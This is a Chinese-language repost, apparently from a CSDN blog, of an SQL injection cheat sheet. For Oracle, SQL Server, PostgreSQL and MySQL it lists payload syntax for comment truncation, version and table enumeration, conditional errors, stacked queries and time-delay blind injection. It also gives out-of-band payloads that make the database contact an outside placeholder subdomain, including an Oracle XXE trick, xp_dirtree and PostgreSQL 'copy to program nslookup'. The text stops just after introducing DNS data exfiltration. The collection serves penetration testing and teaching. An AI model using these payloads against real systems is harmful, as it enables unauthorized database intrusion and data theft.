数据库
首页 > 数据库> > SQL injection cheat sheet

SQL injection cheat sheet

作者:互联网

此SQL注入备忘单包含有用语法的示例,可用于执行执行SQL注入攻击时经常出现的各种任务。

String concatenation

可以将多个字符串串联在一起形成一个字符串

databaseusage
Oracle‘foo’||‘bar’
Microsoft‘foo’+‘bar’
PostgreSQL‘foo’||‘bar’
MySQL‘foo’ ‘bar’ [Note the space between the two strings],CONCAT(‘foo’,‘bar’)

Substring

可以从指定长度的指定偏移量中提取字符串的一部分。请注意,偏移索引是基于1的。下面的每个表达式都将返回字符串ba。

databaseusage
OracleSUBSTR(‘foobar’, 4, 2)
MicrosoftSUBSTRING(‘foobar’, 4, 2)
PostgreSQLSUBSTRING(‘foobar’, 4, 2)
MySQLSUBSTRING(‘foobar’, 4, 2)

Comments

可以使用注释截断查询,并删除原始查询中紧跟输入的部分。

databaseusage
Oracle- - comment
Microsoft- - comment,/*comment*/
PostgreSQL- - comment,/*comment*/
MySQL#comment,-- comment [注意双破折号后面的空格],/*comment*/

Database version

可以查询数据库以确定其类型和版本。这些信息在制定更复杂的攻击时非常有用

databaseusage
OracleSELECT banner FROM v$version,SELECT version FROM v$instance
MicrosoftSELECT @@version
PostgreSQLSELECT version()
MySQLSELECT @@version

Database contents

可以列出数据库中存在的表以及这些表包含的列。

databaseusage
OracleSELECT * FROM all_tables;SELECT * FROM all_tab_columns WHERE table_name = ‘TABLE-NAME-HERE’
MicrosoftSELECT * FROM information_schema.tables;SELECT * FROM information_schema.columns WHERE table_name = ‘TABLE-NAME-HERE’
PostgreSQLSELECT * FROM information_schema.tables;SELECT * FROM information_schema.columns WHERE table_name = ‘TABLE-NAME-HERE’
MySQLSELECT * FROM information_schema.tables;SELECT * FROM information_schema.columns WHERE table_name = ‘TABLE-NAME-HERE’

Conditional errors(条件错误)

可以测试单个布尔条件,如果条件为真,则触发数据库错误。

databaseusage
OracleSELECT CASE WHEN (YOUR-CONDITION-HERE) THEN to_char(1/0) ELSE NULL END FROM dual
MicrosoftSELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END
PostgreSQLSELECT CASE WHEN (YOUR-CONDITION-HERE) THEN cast(1/0 as text) ELSE NULL END
MySQLSELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),‘a’)

Batched (or stacked) queries(批处理(或堆叠)查询)

可以使用批处理查询连续执行多个查询。请注意,在执行后续查询时,结果不会返回到应用程序。因此,此技术主要用于盲注漏洞,您可以使用第二个查询触发DNS查找、条件错误或时间延迟。

databaseusage
OracleDoes not support batched queries.
MicrosoftQUERY-1-HERE; QUERY-2-HERE
PostgreSQLQUERY-1-HERE; QUERY-2-HERE
MySQLQUERY-1-HERE; QUERY-2-HERE

注:对于MySQL,批处理查询通常不能用于SQL注入。但是,如果目标应用程序使用特定的PHP或pythonapi与MySQL数据库通信,则有时可能会出现这种情况。

Time delays

处理查询时,可能会导致数据库出现时间延迟。以下情况将导致10秒的无条件延时。

databaseusage
Oracledbms_pipe.receive_message((‘a’),10)
MicrosoftWAITFOR DELAY ‘0:0:10’
PostgreSQLSELECT pg_sleep(10)
MySQLSELECT sleep(10)

Conditional time delays

您可以测试一个布尔条件,如果条件为真,则触发一个时间延迟。

databaseusage
OracleSELECT CASE WHEN (YOUR-CONDITION-HERE) THEN ‘a’||dbms_pipe.receive_message((‘a’),10) ELSE NULL END FROM dual
MicrosoftIF (YOUR-CONDITION-HERE) WAITFOR DELAY ‘0:0:10’
PostgreSQLSELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END
MySQLSELECT IF(YOUR-CONDITION-HERE,sleep(10),‘a’)

DNS lookup

您可以使数据库对外部域执行DNS查找。为此,您需要使用Burp Collaborator client生成将在攻击中使用的唯一Burp Collaborator子域,然后轮询Collaborator服务器以确认发生了DNS查找。

databaseusage
OracleThe following technique leverages an XML external entity (XXE) vulnerability to trigger a DNS lookup. The vulnerability has been patched but there are many unpatched Oracle installations in existence:SELECT extractvalue(xmltype(’<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://YOUR-SUBDOMAIN-HERE.burpcollaborator.net/"> %remote;]>’),’/l’) FROM dual
Microsoftexec master…xp_dirtree ‘//YOUR-SUBDOMAIN-HERE.burpcollaborator.net/a’
PostgreSQLcopy (SELECT ‘’) to program ‘nslookup YOUR-SUBDOMAIN-HERE.burpcollaborator.net’
MySQLThe following techniques work on Windows only:LOAD_FILE(’\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\\a’)SELECT … INTO OUTFILE ‘\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\a’

DNS lookup with data exfiltration

您可以使数据库对包含注入查询结果的外部域执行DNS查找。为此,您需要使用Burp Collaborator client生成将用于攻击的唯一Burp Collaborator子域,然后轮询Collaborator服务器以检索任何DNS交互的详细信息,包括导出的数据。

标签:10,sheet,cheat,HERE,CONDITION,DNS,injection,YOUR,SELECT
来源: https://blog.csdn.net/weixin_43047908/article/details/115556798